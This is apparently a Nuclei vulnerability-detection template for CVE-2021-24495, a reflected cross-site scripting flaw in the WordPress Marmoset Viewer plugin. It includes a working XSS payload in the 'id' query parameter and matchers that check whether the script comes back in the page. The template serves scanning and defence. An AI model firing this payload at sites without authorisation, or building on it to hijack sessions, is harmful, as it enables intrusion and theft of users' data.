id: CVE-2021-24495 info: name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting author: johnjhacking severity: medium description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update the Wordpress Marmoset Viewer plugin to version 1.9.3 or later to mitigate the vulnerability. reference: - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/ - https://wordpress.org/plugins/marmoset-viewer/#developers - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638 - https://nvd.nist.gov/vuln/detail/CVE-2021-24495 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24495 cwe-id: CWE-79 epss-score: 0.00116 epss-percentile: 0.44405 cpe: cpe:2.3:a:marmoset:marmoset_viewer:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: marmoset product: marmoset_viewer framework: wordpress tags: cve2021,cve,xss,wpscan,wp-plugin,wordpress,intrusive,marmoset http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://" - "{{BaseURL}}/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a" matchers-condition: and matchers: - type: word part: body words: - - alert(/{{randstr}}/) condition: or - type: word words: - Marmoset Viewer - type: word part: header words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100ad62d472ea3292c9468e6cb2fd946e3f2d275d92502da6f4c39ce040ba978b140220053b172dcde7c61ebe9b7ed6248cd910e232bb089c8707aaaedb6a4bc7f52f8e:922c64590222798bb761d5b6d8e72950